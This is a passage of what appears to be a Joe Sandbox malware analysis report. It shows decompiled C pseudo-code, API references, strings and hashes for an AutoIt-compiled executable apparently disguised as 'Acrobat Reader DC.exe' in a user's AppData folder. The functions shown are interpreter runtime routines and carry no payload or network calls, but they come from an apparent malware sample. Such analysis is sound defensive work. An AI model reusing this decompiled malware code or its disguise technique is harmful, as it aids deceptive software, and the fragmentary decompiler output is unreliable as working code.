				intOrPtr _v92;
				struct tagOFNA _v96;
				void* __ebx;
				void* __edi;
				int _t18;
				void* _t24;
				char* _t28;
				short* _t33;
				void* _t34;
				void* _t38;

				_t38 = __fp0;
				_t34 = __esi;
				_t33 = __eax;
				 *((char*)(__esi + 3)) =  *0x4974e8;
				_t37 =  *__eax;
				if( *__eax == 0) {
					_t31 =  &_v96;
					 *_t28 = 1;
					E00412F40( &_v96, 0, 0x58);
					_v96 = 0x58;
					_v48 = L"Run Script:";
					_v92 = 0;
					_v68 = _t33;
					_v64 = 0x104;
					_v84 = L"AutoIt script files (*.au3, *.a3x)";
					_v72 = 1;
					_v44 = 0x1804;
					_v36 = L"au3";
					_t18 = GetOpenFileNameW( &_v96);
					__eflags = _t18;
					if(_t18 != 0) {
						goto L1;
					}
					return 0;
				}
				L1:
				E00410120(_t33, _t33, _t31);
				E004102B0(_t33, _t33, _t34); // executed
				_t24 = E0040F570(_t33, _a4, _t33, _t37, _t38, _t34, E00410190(_t34, _t33, _t33), _a4); // executed
				return _t24;
			}




















                                  0x0040f520
                                  0x0040f520
                                  0x0040f528
                                  0x0040f52f
                                  0x0040f532
                                  0x0040f536
                                  0x004295cb
                                  0x004295d1
                                  0x004295d4
                                  0x004295e0
                                  0x004295e7
                                  0x004295ee
                                  0x004295f5
                                  0x004295f8
                                  0x004295ff
                                  0x00429606
                                  0x0042960d
                                  0x00429614
                                  0x0042961b
                                  0x00429621
                                  0x00429623
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00429629
                                  0x0040f53c
                                  0x0040f540
                                  0x0040f547
                                  0x0040f55d
                                  0x00000000

                                  APIs
                                  • _memset.LIBCMT ref: 004295D4
                                  • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                    • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,0040F545,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,004A90E8,C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe,?,0040F545), ref: 0041013C
                                    • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                    • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                    • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                    • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                    • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
                                  • String ID: X$pWH
                                  • API String ID: 2873425188-941433119
                                  • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                                  • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                                  • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040EBD0(struct HINSTANCE__** __esi) {
				struct HINSTANCE__* _t3;
				_Unknown_base(*)()* _t4;

				if(__esi[2] == 0) {
					_t3 = LoadLibraryA("uxtheme.dll"); // executed
					 *__esi = _t3;
					if(_t3 != 0) {
						_t4 = GetProcAddress(_t3, "IsThemeActive");
						__esi[2] = _t4;
						return _t4;
					}
				}
				return _t3;
			}





                                  0x0040ebd4
                                  0x0040ebdb
                                  0x0040ebe1
                                  0x0040ebe5
                                  0x0040ebed
                                  0x0040ebf3
                                  0x00000000
                                  0x0040ebf3
                                  0x0040ebe5
                                  0x0040ebf6

                                  APIs
                                  • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                  • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: AddressLibraryLoadProc
                                  • String ID: IsThemeActive$uxtheme.dll
                                  • API String ID: 2574300362-3542929980
                                  • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                  • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                  • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040F570 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 247COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 63%
                                  			E0040F570(void* __eax, void* __ecx, void* __edx, void* __eflags, signed int __fp0, intOrPtr _a4, void* _a8, signed int _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				short _v26;
				short _v28;
				signed int _v32;
				signed int _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v64;
				char _v80;
				char _v96;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t97;
				signed int* _t99;
				signed int* _t108;
				signed int* _t119;
				signed int* _t120;
				signed int* _t122;
				intOrPtr _t129;
				void* _t130;
				signed int _t131;
				signed int _t142;
				signed int* _t146;
				signed int _t157;
				signed int _t159;
				void* _t160;
				signed int _t162;
				signed int _t164;
				signed int _t170;
				signed int _t174;
				signed int _t178;
				signed int _t179;
				signed int _t181;
				void* _t184;
				intOrPtr _t195;
				intOrPtr _t202;
				signed int _t203;
				void* _t209;
				signed int _t212;
				signed int _t215;
				void* _t217;
				void* _t218;

				_t224 = __fp0;
				_t184 = __edx;
				_t209 = __eax;
				_t97 = E0040F760(__ecx,  &_v48, __eflags, __eax); // executed
				if(_t97 == 0) {
					_t164 =  &_v48;
					_t99 = E004528BD(__eflags, _t164, L">>>AUTOIT SCRIPT<<<",  &_a8,  &_a12); // executed
					__eflags = _t99;
					if(__eflags == 0) {
						_t101 =  *_a8;
						_t202 = _a4;
						_t14 = _t101 + 1; // 0x2
						_t210 = _t14;
						 *((intOrPtr*)(_t202 + 0x10)) =  *_a8;
						_v28 = _t164 | 0xffffffff;
						_t157 = 0;
						_a12 = 4;
						_v64 = 0x485a84;
						_v60 = 0;
						_v56 = 0;
						_v52 = 0;
						_t170 = ( ~(0 | __eflags > 0x00000000) | _t210 * 0x00000010) + 4;
						_push( ~(0 | __eflags > 0x00000000) | _t170);
						_t108 = E004115D7(_t202, _t210, __eflags);
						_t218 = _t217 + 4;
						__eflags = _t108;
						if(_t108 != 0) {
							_t30 =  &(_t108[1]); // 0x4
							_t170 = _t30;
							 *_t108 = _t210;
							_v24 = _t170;
							E00410CA0(_t210, 0x4023e8, _t170, 0x10);
							_t157 = _v24;
						}
						_t171 = _t170 | 0xffffffff;
						 *((intOrPtr*)(_t202 + 0x44)) = _t157;
						_v26 = _t170 | 0xffffffff;
						__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 1;
						if( *((intOrPtr*)(_t202 + 0x10)) < 1) {
							L29:
							E00413748(_a8); // executed
							E00431E58( &_v48); // executed
							E0040EDC0( &_v64, _t202, _t210);
							E0044B469(__eflags,  &_v36);
							return 1;
						}
						_v20 = 1;
						_v24 = 0x10;
						do {
							E0040D530( &_v64, _t171);
							goto L12;
							do {
								while(1) {
									L12:
									_t174 = _a12;
									_t159 =  *(_t174 + _a8) & 0x000000ff;
									_t203 = _t159;
									_a12 = _t174 + 1;
									E00402710(_t203,  &_v36, _t224);
									_t119 = E0043259D( &_v36);
									__eflags = _t119;
									if(_t119 != 0) {
										break;
									}
									_t171 =  &_v36;
									_t120 = E0043257B( &_v36);
									__eflags = _t120;
									if(_t120 == 0) {
										_t122 = E00432559( &_v36);
										__eflags = _t122;
										if(_t122 == 0) {
											__eflags = E004325BE( &_v36);
											if(__eflags == 0) {
												goto L27;
											}
											_t171 =  &_a12;
											_v16 = _t159;
											_t130 = E00444AF8(__eflags, _a8,  &_a12); // executed
											_t160 = _t130;
											_t131 = _t203;
											__eflags = _t131 - 0x31;
											if(__eflags != 0) {
												__eflags = _t131 - 0x30;
												if(__eflags != 0) {
													_push(_t160);
													__eflags = _t131 - 0x37;
													if(__eflags != 0) {
														_push( &_v36); // executed
														E0044B41C( &_a12, _t203,  &_v36, __eflags); // executed
														L26:
														_push(_t160);
														E004111DC();
														_t159 = _v16;
														_t218 = _t218 + 4;
														goto L27;
													}
													_push(_a4);
													E0044C7DD( &_a12, _t203);
													_push(_t160);
													E004111DC();
													_t218 = _t218 + 4;
													continue;
												}
												E00401B10(_t160,  &_v96, __eflags);
												_v12 = E00444A7E(__eflags,  &_v96);
												E00402250( &_v96);
												E00402710(0,  &_v36, _t224);
												_t171 = _v12;
												_v36 = _v12;
												goto L26;
											}
											_t215 =  &_v80;
											E00401B10(_t160, _t215, __eflags);
											_t142 = E00444ABD(_a4, _t215);
											_t171 = _t215;
											_v12 = _t142;
											E00402250(_t215);
											E00402710(1,  &_v36, _t224);
											_v36 = _v12;
											goto L26;
										}
										_t178 = _a12;
										_t195 = _a8;
										_t224 =  *(_t178 + _t195);
										_t171 = _t178 + 8;
										_v36 =  *(_t178 + _t195);
										_a12 = _t178 + 8;
										goto L27;
									}
									_t179 = _a12;
									_t146 = _t179 + _a8;
									_a12 = _t179 + 8;
									_t171 =  *_t146;
									_v36 =  *_t146;
									_v32 = _t146[1];
									goto L27;
								}
								_t181 = _a12;
								_t171 = _t181 + 4;
								_a12 = _t181 + 4;
								_v36 =  *(_t181 + _a8);
								L27:
								E00402780( &_v36, _t171,  &_v64);
								__eflags = _t159 - 0x7f;
							} while (_t159 != 0x7f);
							_t212 = _v24;
							_t202 = _a4;
							E004022D0( *((intOrPtr*)(_t202 + 0x44)) + _t212,  &_v64); // executed
							_t129 = _v20 + 1;
							_t210 = _t212 + 0x10;
							_v20 = _t129;
							_v24 = _t212 + 0x10;
							__eflags = _t129 -  *((intOrPtr*)(_t202 + 0x10));
						} while (_t129 <=  *((intOrPtr*)(_t202 + 0x10)));
						goto L29;
					}
					E00431E58( &_v48);
					L6:
					E00434034( *((intOrPtr*)(_a4 + 0x48)),  *(_a4 + 3) & 0x000000ff);
					return 0;
				}
				_t162 = _a12;
				if( *_t162 == 4) {
					goto L6;
				}
				 *_t162 = 2;
				return E004033C0(_t184, __fp0, _a4, _t209, _a8, _t209, 0x484ea8, 0);
			}



















































                                  0x0040f570
                                  0x0040f570
                                  0x0040f579
                                  0x0040f57f
                                  0x0040f586
                                  0x00429342
                                  0x00429346
                                  0x0042934b
                                  0x0042934d
                                  0x00429376
                                  0x00429378
                                  0x0042937e
                                  0x0042937e
                                  0x00429381
                                  0x00429384
                                  0x0042938a
                                  0x00429398
                                  0x0042939f
                                  0x004293a6
                                  0x004293a9
                                  0x004293ac
                                  0x004293b5
                                  0x004293bf
                                  0x004293c0
                                  0x004293c5
                                  0x004293c8
                                  0x004293ca
                                  0x004293cc
                                  0x004293cc
                                  0x004293cf
                                  0x004293da
                                  0x004293dd
                                  0x004293e2
                                  0x004293e2
                                  0x004293e5
                                  0x004293ed
                                  0x004293f0
                                  0x004293f4
                                  0x004293f7
                                  0x0042959c
                                  0x004295a0
                                  0x004295ac
                                  0x004295b4
                                  0x004295bd
                                  0x00000000
                                  0x004295c2
                                  0x004293fd
                                  0x00429400
                                  0x00429407
                                  0x0042940a
                                  0x0042940a
                                  0x0042940f
                                  0x0042940f
                                  0x0042940f
                                  0x0042940f
                                  0x00429415
                                  0x0042941d
                                  0x00429422
                                  0x00429425
                                  0x0042942b
                                  0x00429430
                                  0x00429432
                                  0x00000000
                                  0x00000000
                                  0x0042944d
                                  0x00429451
                                  0x00429456
                                  0x00429458
                                  0x0042947d
                                  0x00429482
                                  0x00429484
                                  0x004294a9
                                  0x004294ab
                                  0x00000000
                                  0x00000000
                                  0x004294b4
                                  0x004294b9
                                  0x004294bc
                                  0x004294c1
                                  0x004294c3
                                  0x004294c5
                                  0x004294c8
                                  0x004294fd
                                  0x00429500
                                  0x0042952e
                                  0x0042952f
                                  0x00429532
                                  0x0042954e
                                  0x0042954f
                                  0x00429554
                                  0x00429554
                                  0x00429555
                                  0x0042955a
                                  0x0042955d
                                  0x00000000
                                  0x0042955d
                                  0x00429537
                                  0x00429538
                                  0x0042953d
                                  0x0042953e
                                  0x00429543
                                  0x00000000
                                  0x00429543
                                  0x00429507
                                  0x00429514
                                  0x00429517
                                  0x00429521
                                  0x00429526
                                  0x00429529
                                  0x00000000
                                  0x00429529
                                  0x004294cc
                                  0x004294cf
                                  0x004294d9
                                  0x004294de
                                  0x004294e0
                                  0x004294e3
                                  0x004294f0
                                  0x004294f8
                                  0x00000000
                                  0x004294f8
                                  0x00429486
                                  0x00429489
                                  0x0042948c
                                  0x00429492
                                  0x00429495
                                  0x00429498
                                  0x00000000
                                  0x00429498
                                  0x0042945a
                                  0x00429460
                                  0x00429469
                                  0x0042946c
                                  0x0042946e
                                  0x00429471
                                  0x00000000
                                  0x00429471
                                  0x00429434
                                  0x0042943f
                                  0x00429442
                                  0x00429445
                                  0x00429560
                                  0x00429566
                                  0x0042956b
                                  0x0042956b
                                  0x00429574
                                  0x00429578
                                  0x00429581
                                  0x00429589
                                  0x0042958a
                                  0x0042958d
                                  0x00429590
                                  0x00429593
                                  0x00429593
                                  0x00000000
                                  0x00429407
                                  0x00429353
                                  0x00429358
                                  0x00429364
                                  0x00000000
                                  0x0042936c
                                  0x0040f58c
                                  0x0040f592
                                  0x00000000
                                  0x00000000
                                  0x0040f5a9
                                  0x00000000

                                  APIs
                                  • _free.LIBCMT ref: 004295A0
                                    • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                    • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                    • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                    • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                    • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                    • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
                                  • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 2744521063-368524663
                                  • Opcode ID: 880aae0f25a8000fe6588a260fc2cee1b6e9e9d2e5696b5ac2ca62059b09666c
                                  • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                                  • Opcode Fuzzy Hash: 880aae0f25a8000fe6588a260fc2cee1b6e9e9d2e5696b5ac2ca62059b09666c
                                  • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 67%
                                  			E00401B10(void* __edi, intOrPtr* __esi, void* __eflags) {
				intOrPtr _t14;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t18;
				intOrPtr* _t20;
				void* _t34;
				intOrPtr* _t35;
				signed int _t41;

				_t35 = __esi;
				_t34 = __edi;
				_t14 = E004111C1(__edi);
				 *((intOrPtr*)(__esi + 4)) = _t14;
				_t15 = _t14 + 1;
				 *((intOrPtr*)(__esi + 8)) = _t15;
				if(_t15 == 0) {
					_t16 = 8;
				} else {
					_t16 = (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3) + (_t15 + 7 >> 3);
					_t41 = _t16;
				}
				 *(_t35 + 8) = _t16;
				_push( ~(0 | _t41 > 0x00000000) | _t16 * 0x00000002); // executed
				_t18 = E004115D7(_t34, _t35, _t41); // executed
				 *_t35 = _t18;
				E00410E60(_t18, _t34,  *((intOrPtr*)(_t35 + 4)) +  *((intOrPtr*)(_t35 + 4)) + 2);
				_push(4); // executed
				_t20 = E004115D7(_t34, _t35, _t41); // executed
				if(_t20 == 0) {
					_t20 = 0;
				} else {
					 *_t20 = 1;
				}
				 *((intOrPtr*)(_t35 + 0xc)) = _t20;
				return _t35;
			}











                                  0x00401b10
                                  0x00401b10
                                  0x00401b11
                                  0x00401b19
                                  0x00401b1c
                                  0x00401b1d
                                  0x00401b20
                                  0x00426521
                                  0x00401b26
                                  0x00401b30
                                  0x00401b30
                                  0x00401b30
                                  0x00401b34
                                  0x00401b45
                                  0x00401b46
                                  0x00401b55
                                  0x00401b57
                                  0x00401b5c
                                  0x00401b5e
                                  0x00401b68
                                  0x0042652b
                                  0x00401b6e
                                  0x00401b6e
                                  0x00401b6e
                                  0x00401b74
                                  0x00401b79

                                  APIs
                                  • _wcslen.LIBCMT ref: 00401B11
                                    • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                  • _memmove.LIBCMT ref: 00401B57
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                    • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                    • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                                  • String ID: @EXITCODE
                                  • API String ID: 2734553683-3436989551
                                  • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                                  • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                                  • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 90%
                                  			E00410100(void* __eax, void* __ecx, void* __eflags) {
				char _v8;
				char _v12;
				char _v24;
				void* __edi;
				void* _t9;
				void* _t11;

				_t9 = E0040F760(__ecx,  &_v24, __eflags, __eax); // executed
				if(_t9 == 0) {
					_t11 = E004528BD(__eflags,  &_v24, L">>>AUTOIT NO CMDEXECUTE<<<",  &_v8,  &_v12); // executed
					__eflags = _t11;
					if(_t11 == 0) {
						E00413748(_v8);
						E00431E58( &_v24);
						return 1;
					} else {
						E00431E58( &_v24); // executed
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}









                                  0x0041010b
                                  0x00410112
                                  0x00428058
                                  0x0042805d
                                  0x0042805f
                                  0x00428073
                                  0x0042807f
                                  0x0042808a
                                  0x00428061
                                  0x00428065
                                  0x00000000
                                  0x00428065
                                  0x00410118
                                  0x00410118
                                  0x0041011e
                                  0x0041011e

                                  Strings
                                  • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                                  • C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe, xrefs: 00410107
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                  • API String ID: 0-1618683850
                                  • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                                  • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                                  • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0043213D(void* __edx, void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t5;
				intOrPtr _t6;
				intOrPtr _t7;
				intOrPtr _t11;
				void* _t13;
				intOrPtr _t14;
				intOrPtr _t15;

				_t12 = __edx;
				_t15 = _a4;
				_t5 = E004135BB(__edx, _t13, _t15, 0x20000); // executed
				_t14 = _t5;
				 *((intOrPtr*)(_t15 + 0x438)) = _t14;
				_t6 = E004135BB(__edx, _t14, _t15, 0x10000); // executed
				_t11 = _t6;
				 *((intOrPtr*)(_t15 + 0x45c)) = _t11;
				_t7 = E004135BB(_t12, _t14, _t15, 0x10000); // executed
				 *((intOrPtr*)(_t15 + 0x458)) = _t7;
				if(_t14 == 0 || _t11 == 0 || _t7 == 0) {
					E004320F8(_t15);
					return 5;
				} else {
					return 0;
				}
			}












                                  0x0043213d
                                  0x00432142
                                  0x0043214b
                                  0x00432150
                                  0x00432157
                                  0x0043215d
                                  0x00432162
                                  0x00432169
                                  0x0043216f
                                  0x00432177
                                  0x0043217f
                                  0x00432193
                                  0x004321a1
                                  0x0043218b
                                  0x0043218f
                                  0x0043218f

                                  APIs
                                  • _malloc.LIBCMT ref: 0043214B
                                    • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                    • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                    • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                                  • _malloc.LIBCMT ref: 0043215D
                                  • _malloc.LIBCMT ref: 0043216F
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: _malloc$AllocateHeap
                                  • String ID:
                                  • API String ID: 680241177-0
                                  • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                                  • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                                  • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D6B0(void* __fp0, char _a4, short* _a12) {
				int _v8;
				intOrPtr _v12;
				char _v20;
				int _v24;
				intOrPtr _v28;
				char _v36;
				int _v40;
				char _v48;
				struct HINSTANCE__* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t21;
